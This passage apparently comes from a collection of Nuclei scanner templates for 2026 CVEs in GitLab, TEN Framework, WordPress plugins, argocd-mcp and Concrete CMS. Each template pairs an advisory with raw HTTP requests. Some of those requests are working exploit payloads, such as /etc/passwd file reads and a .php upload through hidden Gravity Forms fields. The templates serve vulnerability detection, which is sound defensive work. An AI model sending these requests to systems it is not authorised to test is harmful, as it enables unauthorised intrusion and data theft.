them before routing to Grape. Appending a trailing slash to commits or percent-encoding a static path segment as %63ommits therefore bypasses Workhorse upload route rewriting, and Rails reaches file_params_from_body_upload() which opens the path given in the file.path parameter before authenticate! is enforced. On the application/x-www-form-urlencoded branch the file bytes are handed to Rack::Utils.parse_nested_query, and any invalid percent sequence raises an ArgumentError whose message is interpolated into the HTTP 400 response body, disclosing file content to an unauthenticated caller.\n  impact: |\n    Unauthenticated remote attackers can read any file accessible to the GitLab git user, including /etc/passwd, database credentials, secrets.yml, SSH private keys, and CI build artifacts, which in turn enables session forgery and full compromise of the instance. Exploitation requires at least one publicly readable project on the target.\n  remediation: |\n    Upgrade GitLab CE/EE to 19.1.8, 19.2.6, or 19.3.2 or later. The fix moves authenticate! ahead of file processing and stops accepting raw file.path and file.size parameters from untrusted clients.\n  reference:\n    - https://about.gitlab.com/releases/2026/09/10/patch-release-gitlab-19-3-2-released/\n    - https://gitlab.com/gitlab-org/gitlab/-/commit/0ff7b6b2911723389f2271b10362591b0a69a166\n    - https://github.com/ynsmroztas/GitLabSniper\n    - https://github.com/mhtsec/CVE-2026-85706\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-85706\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10.0\n    cve-id: CVE-2026-85706\n    epss-score: 0.09287\n    epss-percentile: 0.95138\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: gitlab\n    product: gitlab\n    shodan-query: http.title:\"GitLab\"\n    fofa-query: title=\"gitlab\"\n  tags: cve,cve2026,gitlab,lfi,unauth,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/v4/projects/1/repository/%66iles/{{randstr}}?file=&file.path=/cve-2026-85706-nuclei-probe&file.size=1&Content-Type=application/x-www-form-urlencoded HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Accept: application/json, */*\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"local file not present\"\n\n      - type: status\n        status:\n          - 400\n# digest: 490a004630440220784ae3a889adcbb60cfe6d14a57a98692e5886e28dbb1073fe2a75ea0ad9085102201e77463f8c614cdfb5550f0db79ec9d2b5ca93771a9f70afc287c5e0540dd6dc:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-85706.yaml","vuln_id":"cve-2026-85706"},{"raw":"id: CVE-2026-85688\n\ninfo:\n  name: TEN Framework - Arbitrary File Read & Write\n  author: aryu-ru,geo-chen\n  severity: critical\n  description: |\n    TEN Framework 0.11.71 contains unauthenticated arbitrary file read and write vulnerabilities in the TMAN Designer file-content API endpoints, letting attackers read or write arbitrary files and execute code. The exploit requires no authentication.\n  impact: |\n    Attackers can read and write arbitrary files and execute code, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of TEN Framework.\n  reference:\n    - https://www.vulncheck.com/advisories/ten-framework-0.11.71-unauthenticated-file-read-write-via-tman-designer\n    - https://github.com/TEN-framework/ten-framework/issues/2187\n    - https://github.com/TEN-framework/ten-framework/blob/0.11.71/core/src/ten_manager/src/designer/file_content/mod.rs\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-85688\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-85688\n    epss-score: 0.01469\n    epss-percentile: 0.72598\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ten-framework\n    product: ten-framework\n    shodan-query: http.title:\"TEN Manager\"\n    fofa-query: title=\"TEN Manager\"\n  tags: cve,cve2026,ten-framework,tman,lfi,ai,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /api/designer/v1/file-content HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"file_path\":\"/etc/passwd\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"\\\"status\\\":\\\"ok\\\"\", \"\\\"data\\\":{\\\"content\\\":\\\"\", \"root:\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a00463044022023f8df55e6a7d949c550e4f8ca3229cd9e5c079f0e65e8c90a79ba1d75f620dc02200469fef92af64d4a9249f3b8b4adef67def99884058fdf6461ae4c7d4257c9a0:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-85688.yaml","vuln_id":"cve-2026-85688"},{"raw":"id: CVE-2026-85200\n\ninfo:\n  name: GEO my WP <=4.5.5.3 - Unauthenticated Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: |\n    GEO my WP WordPress plugin <= 4.5.5.3 contains a local file inclusion caused by improper handling in gmw_posts_locator_ajax_info_window_loader function, letting unauthenticated attackers execute arbitrary PHP code remotely.\n  impact: |\n    Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full server compromise and data exposure.\n  remediation: |\n    Update to the latest version beyond 4.5.5.3.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/562712a8-a42e-4b36-9985-3c71698efdda\n    - https://github.com/Fitoussi/geo-my-wp/commit/5a768bf1c6e44ded83a65be8789f3587515665ac\n    - https://plugins.trac.wordpress.org/browser/geo-my-wp/tags/4.5.5.3/includes/gmw-functions.php#L1945\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-85200\n    epss-score: 0.01903\n    epss-percentile: 0.78802\n    cwe-id: CWE-98\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: developer.developer\n    product: geo-my-wp\n    shodan-query: 'http.html:\"/wp-content/plugins/geo-my-wp/\"'\n    fofa-query: 'body=\"/wp-content/plugins/geo-my-wp/\"'\n  tags: cve,cve2026,wordpress,wp-plugin,geo-my-wp,lfi,unauth\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=gmw_info_window_init&location[object_id]=1&location[location_id]=1&form[component]=posts_locator&form[prefix]=pt&form[info_window_template][content_path]=/etc/passwd\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"root:x:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402201f5877ecd9665615f3d2f92154016ab9e2d2c890ac51d44710beebcf91e1955b022005266f3401d915e2da5078211a576b6845378269ab65378d237db12c10852014:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-85200.yaml","vuln_id":"cve-2026-85200"},{"raw":"id: CVE-2026-84434\n\ninfo:\n  name: WordPress Gravity Forms Plugin <=3.1.0.4 - Unauthenticated Arbitrary File Upload\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Gravity Forms WordPress plugin version 3.1.0.4 and earlier contains an unauthenticated arbitrary file upload vulnerability caused by bypassing extension validation in hidden file upload fields. Unauthenticated attackers can upload any file type including PHP when a form has a File Upload field configured with Hidden visibility. The bypass works because the server-side extension validation is skipped for fields with gfield_visibility_hidden CSS class.\n  impact: |\n    Unauthenticated attackers can upload arbitrary files including PHP webshells, enabling remote code execution on the web server leading to full server compromise.\n  remediation: |\n    Update Gravity Forms to version 3.1.1 or later.\n  reference:\n    - https://github.com/murrez/CVE-2026-84434\n    - https://patchstack.com/database/wordpress/plugin/gravityforms/vulnerability/wordpress-gravity-forms-plugin-3-1-0-4-unauthenticated-arbitrary-file-upload-via-hidden-file-upload-field-vulnerability\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/787e22a9-329b-4e71-bc2a-4f5524fc9356\n    - https://docs.gravityforms.com/gravityforms-change-log/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-84434\n    epss-score: 0.02756\n    epss-percentile: 0.85598\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 21\n    vendor: rocketgenius\n    product: gravityforms\n    shodan-query: 'http.html:\"gravityforms\" http.html:\"gform_wrapper\"'\n    fofa-query: 'body=\"gravityforms\" && body=\"gform_wrapper\"'\n  tags: cve,cve2026,wordpress,plugin,gravityforms,file-upload,rce,unauth,vkev\n\nvariables:\n  marker: \"{{rand_text_alpha(16)}}\"\n  fname: \"{{rand_text_alpha(10)}}\"\n  boundary: \"NucleiUpload{{rand_text_alpha(12)}}\"\n\nflow: |\n  http(\"detect\");\n\n  let scanPaths = [\"/\", \"/contact/\", \"/contact-us/\", \"/get-in-touch/\", \"/support/\",\n                   \"/apply/\", \"/register/\", \"/signup/\", \"/donate/\", \"/quote/\",\n                   \"/request-quote/\", \"/book/\", \"/appointment/\", \"/upload/\"];\n\n  let formFound = false;\n\n  for (let i = 0; i < scanPaths.length; i++) {\n    set(\"scan_path\", scanPaths[i]);\n    http(\"scan\");\n\n    if (template[\"form_id\"] && template[\"hidden_field_input_name\"]) {\n      set(\"found_page_path\", scanPaths[i]);\n      formFound = true;\n      break;\n    }\n    set(\"form_id\", \"\");\n    set(\"hidden_field_input_name\", \"\");\n  }\n\n  if (!formFound) {\n    stop();\n  }\n\n  http(\"submit-page\");\n\n  if (!template[\"upload_file_url\"] && !template[\"upload_rel_url\"] && template[\"gform_ajax_value\"]) {\n    http(\"submit-ajax\");\n  }\n\n  let verifyUrl = template[\"upload_file_url\"] || template[\"upload_rel_url\"] || \"\";\n  if (verifyUrl) {\n    if (!verifyUrl.startsWith(\"http\")) {\n      verifyUrl = \"{{BaseURL}}/\" + verifyUrl;\n    }\n    verifyUrl = verifyUrl.replace(/&amp;/g, \"&\");\n    set(\"verify_url\", verifyUrl);\n    http(\"verify-upload\");\n  }\n\nhttp:\n  - id: detect\n    raw:\n      - |\n        GET /wp-content/plugins/gravityforms/gravityforms.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n        internal: true\n\n  - id: scan\n    raw:\n      - |\n        GET {{BaseURL}}{{scan_path}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"gfield_visibility_hidden\", \"gfield--type-fileupload\", \"gravityforms\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: form_id\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'id=[\"'']?gform_wrapper_([0-9]+)[\"'']?'\n\n      - type: regex\n        name: hidden_field_input_name\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'gfield_visibility_hidden[^>]*>[\\s\\S]{0,800}?name=[\"''](input_[0-9]+(?:_[0-9]+)?)[\"''][^>]*type=[\"'']file[\"'']'\n          - 'gfield_visibility_hidden[^>]*>[\\s\\S]{0,800}?type=[\"'']file[\"''][^>]*name=[\"''](input_[0-9]+(?:_[0-9]+)?)[\"'']'\n\n      - type: regex\n        name: form_unique_id\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'name=[\"'']gform_unique_id[\"''][^>]*value=[\"'']([^\"'']*)[\"'']'\n\n      - type: regex\n        name: gform_ajax_value\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'name=[\"'']gform_ajax[\"''][^>]*value=[\"'']([^\"'']*)[\"'']'\n\n  - id: submit-page\n    raw:\n      - |\n        POST {{BaseURL}}{{found_page_path}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----{{boundary}}\n        Referer: {{BaseURL}}{{found_page_path}}\n        Origin: {{RootURL}}\n\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"is_submit_{{form_id}}\"\n\n        1\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_submit\"\n\n        {{form_id}}\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_unique_id\"\n\n        {{form_unique_id}}\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_target_page_number_{{form_id}}\"\n\n        0\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_source_page_number_{{form_id}}\"\n\n        1\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"{{hidden_field_input_name}}\"; filename=\"{{fname}}.php\"\n        Content-Type: application/x-php\n\n        {{marker}}\n        ------{{boundary}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_any(body, \"gform_confirmation\", \"gf-download\", \"wp-content/uploads/gravity_forms\", \"is_valid\")'\n\n\n    extractors:\n      - type: regex\n        name: upload_file_url\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'href=[''\"]((?:https?:)?//[^''\"]*gf-download=[^''\"]+)[''\"]'\n\n      - type: regex\n        name: upload_rel_url\n        part: body\n        internal: true\n        group: 0\n        regex:\n          - 'index\\.php\\?gf-download=[^''\"<>\\s]+'\n\n  - id: submit-ajax\n    raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----{{boundary}}\n        Referer: {{BaseURL}}{{found_page_path}}\n        Origin: {{RootURL}}\n\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"action\"\n\n        gform_ajax\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_ajax\"\n\n        {{gform_ajax_value}}\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"is_submit_{{form_id}}\"\n\n        1\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_submit\"\n\n        {{form_id}}\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_unique_id\"\n\n        {{form_unique_id}}\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_target_page_number_{{form_id}}\"\n\n        0\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"gform_source_page_number_{{form_id}}\"\n\n        1\n        ------{{boundary}}\n        Content-Disposition: form-data; name=\"{{hidden_field_input_name}}\"; filename=\"{{fname}}.php\"\n        Content-Type: application/x-php\n\n        {{marker}}\n        ------{{boundary}}--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_any(body, \"gform_confirmation\", \"gf-download\", \"wp-content/uploads/gravity_forms\", \"is_valid\")'\n        internal: true\n\n    extractors:\n      - type: regex\n        name: upload_file_url\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'href=[''\"]((?:https?:)?//[^''\"]*gf-download=[^''\"]+)[''\"]'\n\n      - type: regex\n        name: upload_rel_url\n        part: body\n        internal: true\n        group: 0\n        regex:\n          - 'index\\.php\\?gf-download=[^''\"<>\\s]+'\n\n  - id: verify-upload\n    raw:\n      - |\n        GET {{verify_url}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"{{marker}}\")'\n# digest: 490a00463044022038fffb8beb7343480355e2c973329a4cc79a25c960664ab9059aa0eaaf70520a022055c2ed59b49b090ed804110a1c0b3a9e9aabd8704c208966d39b584ffe6d9142:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-84434.yaml","vuln_id":"cve-2026-84434"},{"raw":"id: CVE-2026-8386\n\ninfo:\n  name: WP Go Maps < 10.0.10 - Unauthenticated Marker Information Disclosure\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   WP Go Maps WordPress plugin <10.0.10 contains an information disclosure vulnerability caused by lack of approval-state filtering on the public single-marker REST endpoint, letting unauthenticated users access unapproved marker records including PII and geographic coordinates, exploit requires no authentication.\n  impact: |\n    Unauthenticated users can access sensitive unapproved marker data including PII and location coordinates.\n  remediation: |\n    Upgrade to version 10.0.10 or later.\n  reference:\n    - https://wpscan.com/vulnerability/fa7f5cb0-abe2-4079-9290-e0e4dc89f27f/\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8386\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-8386\n    epss-score: 0.007\n    epss-percentile: 0.51737\n    cwe-id: CWE-862\n  metadata:\n    verified: false\n    max-request: 4\n    fofa-query: body=\"/wp-content/plugins/wp-google-maps/\"\n    tags: cve,cve2026,wordpress,wp-plugin,wp-google-maps,disclosure,unauth,rest-api\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wp-google-maps/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WP Go Maps\") || contains(body, \"WP Google Maps\")'\n          - 'compare_versions(lsversion, \">=1.0.0\", \"<=10.0.9\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: lsversion\n        internal: true\n        group: 1\n        regex:\n          - 'Stable tag: ([\\d.]+)'\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?rest_route=/wpgmza/v1/markers/1/\"\n      - \"{{BaseURL}}/?rest_route=/wpgmza/v1/markers/2/\"\n      - \"{{BaseURL}}/?rest_route=/wpgmza/v1/markers/3/\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"approved\", \"lat\", \"lng\", \"map_id\")'\n        condition: and\n# digest: 4a0a00473045022100af20d0294a0a45390ecd3c71cbe9c3cbc0c73d9eb9eb84a2291e2fdb5ba5471f0220676a8b947876331d7948d770b35b62680a6ba4935c82b00d2780c82d2162c17d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-8386.yaml","vuln_id":"cve-2026-8386"},{"raw":"id: CVE-2026-8385\n\ninfo:\n  name: WordPress WP Go Maps < 10.0.10 - Unauthenticated Marker Data Disclosure\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   WP Go Maps WordPress plugin < 10.0.10 contains an information disclosure vulnerability caused by improper enforcement of marker approval filter in admin-ajax fallback for datatables route, letting unauthenticated visitors retrieve unapproved marker records.\n  impact: |\n    Unauthenticated attackers can access unapproved marker data including title, category, address, and description, leading to sensitive information disclosure.\n  remediation: |\n    Update to version 10.0.10 or later.\n  reference:\n    - https://wpscan.com/vulnerability/984cad38-6d01-4956-8bf1-29585258780b/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8385\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-8385\n    epss-score: 0.00801\n    epss-percentile: 0.55085\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: developer-developer\n    product: wp-google-maps\n    framework: wordpress\n    shodan-query: http.html:\"wp-google-maps\"\n    fofa-query: body=\"wp-google-maps\"\n  tags: cve,cve2026,wordpress,wp-plugin,wp,wp-google-maps,exposure\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wp-google-maps/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WP Google Maps\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=wpgmza_rest_api_request&route=%2Fdatatables%2F&phpClass=WPGMZA%5CMarkerDataTable&map_id=1&length=10&start=0&draw=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"recordsTotal\", \"recordsFiltered\", \"address\")'\n        condition: and\n# digest: 4b0a00483046022100a875ffa64f9413b9d13d813fe341741163e4062c142e64cf331be793e659a871022100ae4b0cc57cad802df6d2ea968d4344d29f53d54a22db0dfb33d97ee9bab9232a:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-8385.yaml","vuln_id":"cve-2026-8385"},{"raw":"id: CVE-2026-8383\n\ninfo:\n  name: LearnPress < 4.3.7 - Information Disclosure\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    LearnPress WordPress plugin < 4.3.7 contains an information disclosure vulnerability caused by missing capability checks on a REST endpoint, letting unauthenticated visitors retrieve sensitive user role and capability data via crafted requests.\n  impact: |\n    Unauthenticated attackers can access sensitive user role and capability information, potentially aiding further attacks.\n  remediation: |\n    Update to version 4.3.7 or later.\n  reference:\n    - https://wpscan.com/vulnerability/b7cbf68b-62c5-4787-b84b-69df9e0122b2/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8383\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-8383\n    epss-score: 0.07623\n    epss-percentile: 0.94289\n    cwe-id: CWE-862\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: thimpress\n    product: learnpress\n    fofa-query: body=\"/wp-content/plugins/learnpress/\"\n    tags: cve,cve2026,wordpress,wp,wp-plugin,learnpress,disclosure,rest-api\n\nhttp:\n  - raw:\n      - |\n        GET /wp-json/learnpress/v1/users?context=edit HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"roles\\\"\", \"\\\"capabilities\\\"\", \"registered_date\")'\n        condition: and\n# digest: 4a0a00473045022055fa4e734ddf3afd6c69daabce179d0d411347b32d6a2a50716c95b82626d7240221008909217178478a1868183d9307d5e948696bf90b1b03e6b097bd687acab04216:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-8383.yaml","vuln_id":"cve-2026-8383"},{"raw":"id: CVE-2026-82456\n\ninfo:\n  name: argocd-mcp 0.8.0 - Unauthenticated MCP Session and Tool Access\n  author: kh1166\n  severity: critical\n  description: |\n    argocd-mcp before 0.9.0 binds its MCP HTTP listener to all interfaces without requiring authentication. A remote unauthenticated attacker can initialize an MCP session, complete the handshake, and enumerate or invoke the full Argo CD tool surface using the operator's stored API token.\n  impact: |\n    Remote unauthenticated attackers reach the full Argo CD tool surface with the operator's stored API token. Applications can be created pointing at attacker-controlled repositories and synced, which executes hostile manifests in the managed cluster under Argo CD's permissive default project.\n  remediation: |\n    Upgrade to argocd-mcp 0.9.0 and set MCP_AUTH_TOKEN so inbound callers must present an Authorization bearer header. Keep --bind-address on 127.0.0.1 unless an external auth layer is in front of the listener, and do not use --allow-unauthenticated to restore a wide bind.\n  reference:\n    - https://github.com/argoproj-labs/mcp-for-argocd/security/advisories/GHSA-rp45-5x3v-48mr\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-82456\n    - https://www.vulncheck.com/advisories/argocd-mcp-0.8.0-authentication-bypass-via-unauthenticated-http\n    - https://github.com/argoproj-labs/mcp-for-argocd/releases\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2026-82456\n    epss-score: 0.01391\n    epss-percentile: 0.71131\n    cwe-id: CWE-306\n  metadata:\n    verified: false\n    max-request: 3\n    vendor: argoproj-labs\n    product: mcp-for-argocd\n  tags: cve,cve2026,argocd,argoproj,mcp,auth-bypass,exposure\n\nflow: |\n  http(1)\n  if (template[\"sid\"] == \"\") {\n    stop()\n  }\n  http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json, text/event-stream\n\n        {\"jsonrpc\":\"2.0\",\"id\":1,\"method\":\"initialize\",\"params\":{\"protocolVersion\":\"2024-11-05\",\"capabilities\":{},\"clientInfo\":{\"name\":\"nuclei\",\"version\":\"1.0\"}}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"\\\"serverInfo\\\"\") && contains(body, \"\\\"name\\\":\\\"argocd-mcp\\\"\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: sid\n        part: header\n        internal: true\n        group: 1\n        regex:\n          - '(?i)mcp-session-id:\\s*([0-9a-fA-F-]{36})'\n\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json, text/event-stream\n        mcp-session-id: {{sid}}\n\n        {\"jsonrpc\":\"2.0\",\"method\":\"notifications/initialized\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 202'\n        internal: true\n\n  - raw:\n      - |\n        POST /mcp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        Accept: application/json, text/event-stream\n        mcp-session-id: {{sid}}\n\n        {\"jsonrpc\":\"2.0\",\"id\":2,\"method\":\"tools/list\",\"params\":{}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"\\\"name\\\":\\\"list_applications\\\"\") && contains(body, \"\\\"inputSchema\\\"\")'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: session\n        part: header\n        group: 1\n        regex:\n          - '(?i)mcp-session-id:\\s*([0-9a-fA-F-]{36})'\n\n      - type: regex\n        name: write_tools\n        part: body\n        group: 1\n        regex:\n          - '\"name\":\"(create_application|update_application|delete_application|sync_application|run_resource_action)\"'\n# digest: 4a0a00473045022100d099e5b29b9aaed6faad705563d88deb631c55a54e4a6aa0d6a05c963b9a947602205b8b027c95e29378e8e32c30fde99b58ff567a07d94d86f81b4a0fcb388b2b82:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-82456.yaml","vuln_id":"cve-2026-82456"},{"raw":"id: CVE-2026-8237\n\ninfo:\n  name: Concrete CMS <= 9.5.0 - Unauthenticated Conversation Message Disclosure (IDOR)\n  author: Pauullamm\n  severity: medium\n  description: |\n    Concrete CMS <= 9.5.0 contains an IDOR caused by insufficient access control in /ccm/frontend/conversations/message_detail endpoint, letting unauthenticated attackers enumerate conversation messages and attachments.\n  impact: |\n    Unauthenticated attackers can access restricted conversation messages and file attachments, exposing sensitive information.\n  remediation: |\n    Update to a version later than 9.5.0 or the latest available version\n  reference:\n    - https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes\n    - https://github.com/advisories/GHSA-xpgc-7vc2-8725\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-8237\n  classification:\n    cve-id: CVE-2026-8237\n    cwe-id: CWE-862\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    epss-score: 0.0064\n    epss-percentile: 0.49261\n    cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    verified: true\n    vendor: concretecms\n    product: concrete_cms\n    shodan-query: http.html:\"concrete5\"\n    fofa-query: body=\"concrete5\" || body=\"concretecms\"\n  tags: cve,cve2026,concretecms,concrete5,idor,exposure\n\nhttp:\n  - raw:\n      - |\n        POST /ccm/frontend/conversations/message_detail HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        cnvMessageID=1\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"data-conversation-message-id=\\\"1\\\"\", \"ccm-conversation-message-body\")'\n          - 'contains_any(body, \"ccm-conversation-message-username\", \"ccm-conversation-message-pending-notice\")'\n        condition: and\n# digest: 4a0a0047304502207e98a05c193960b4cc53a7d348ab55f143c877b88b88579e9670e99ee6de480a022100954a4a1c9296a27996a5399717ec361f388770d9a7f737cfa044a96d4ea0dffe:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-8237.yaml","vuln_id":"cve-2026-8237"},{"raw":"id: CVE-2026-8236\n\ninfo:\n  name: Concrete CMS <9.5.1 - Unauthenticated File-Usage Internal Metadata Disclosure\n  author: str4k3r\n  severity: medium\n  description: |\n    Concrete CMS 9.5.0 and below is vulnerable to IDOR combined with a missing authentication gate. The endpoint /ccm/system/dialogs/file/usage/{fID} accepts an integer file ID in the URL and returns internal site structure data (page IDs, versions, URL paths) to anyone who sends a GET request.\n  impact: |\n    Remote attackers can access internal site structure data, potentially exposing sensitive information about the site.\n  remediation: |\n    Update to a version later than 9.5.0 or the latest available version.\n  reference:\n    - https://documentation.concretecms.org/9-x/developers/9.5.1-security-releases\n  classification:\n    cve-id: CVE-2026-8236\n    epss-score: 0.00523\n    epss-percentile: 0.43369\n    cwe-id: CWE-862\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: concretecms\n    product: concrete_cms\n    shodan-query: html:\"/index.php/ccm/system/\"\n  tags: cve,cve2026,concretecms,concrete5,cms,unauth,exposure\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/index.php/ccm/system/dialogs/file/usage/1\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '<td>Page ID</td>'\n          - 'class=\"ccm-ui\"'\n          - '<td>Handle</td>'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 